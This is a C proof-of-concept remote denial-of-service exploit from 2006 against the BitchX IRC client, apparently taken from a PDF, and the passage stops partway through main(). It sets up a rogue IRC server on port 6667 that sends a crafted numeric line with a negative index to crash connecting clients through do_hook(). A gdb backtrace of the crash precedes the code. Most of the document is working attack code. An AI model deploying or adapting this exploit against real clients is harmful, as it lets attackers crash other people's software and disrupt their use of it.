1 // BitchX (epic) =<1.1−final | do_hook() Boundary Check Error Remote DoS
2 /////////////////////////////////////////////////////////////////////////
3 // Federico L. Bossi Bonin
4 // fbossi<at>netcomm<dot>com<dot>ar
5
6
7 // #0 0x080a3fcc in BX_do_hook (which=9999999, format=0x8119077 "%s %s") at hook.c:865
8 // #1 0x080d013b in numbered_command (from=0xbfbfe031 ’A’ <repeats 200 times>,
9 // comm=−9999999, ArgList=0xbfbfd788) at numbers.c:1413
10 // #2 0x080d7d02 in parse_server (orig_line=0xbfbfe030 ":", ’A’ <repeats 199 times>...) at parse.c:1912
11 // #3 0x080de3c2 in do_server (rd=0xbfbfe8a0, wr=0xbfbfe880) at server.c:584
12 // #4 0x080b030f in BX_io (what=0x810b85a "main") at irc.c:1319
13 // #5 0x080b09da in main (argc=6, argv=0xbfbfe9d4, envp=0xbfbfe9f0) at irc.c:1687
14 // #6 0x0804aec2 in ___start ()
15
16 //greats to nitr0us, beck, gruba, samelat, ran, etc..
17
18 #include <stdio.h>
19 #include <sys/types.h>
20 #include <sys/socket.h>
21 #include <netinet/in.h>
22
23 #define PORT 6667
24 #define LEN 100
25
26 int intalign=−999; //use negative number
27
28 void sendbuff(int sock) {
29 char ptr[LEN];
30 char buffer[2048];
31 bzero(ptr,LEN);
32 bzero(buffer,2048);
33 memset(ptr,0x41,sizeof(ptr)−1);
34 sprintf(buffer,":%s %i %s %s\n",ptr,intalign,ptr,ptr);
35 write(sock,buffer,sizeof(buffer));
36 }
37
38 int main() {
39 struct sockaddr_in srv_addr, client;
40 int len,pid,sockfd,sock;
41
42 sockfd = socket(AF_INET, SOCK_STREAM, 0);
43
44 if (sockfd < 0) {
45 perror("error socket()");
46 exit(1);
47 }
48
49 bzero((char *) &srv_addr, sizeof(srv_addr));
50 srv_addr.sin_family = AF_INET;
51 srv_addr.sin_addr.s_addr = INADDR_ANY;
52 srv_addr.sin_port = htons(PORT);
Page 1/2
BitchX 1.1final do_hook Remote Denial of Service Exploit
Federico L. Bossi Bonin
06/24/2006
53
54 if (bind(sockfd, (struct sockaddr *) &srv_addr,sizeof(srv_addr)) < 0) {
55 perror("error bind()");
56 exit(1);
57 }
58
59
60 printf("BitchX (epic) =<1.1−final | do_hook() Boundary Check Error Remote DoS\n");
61 printf("=======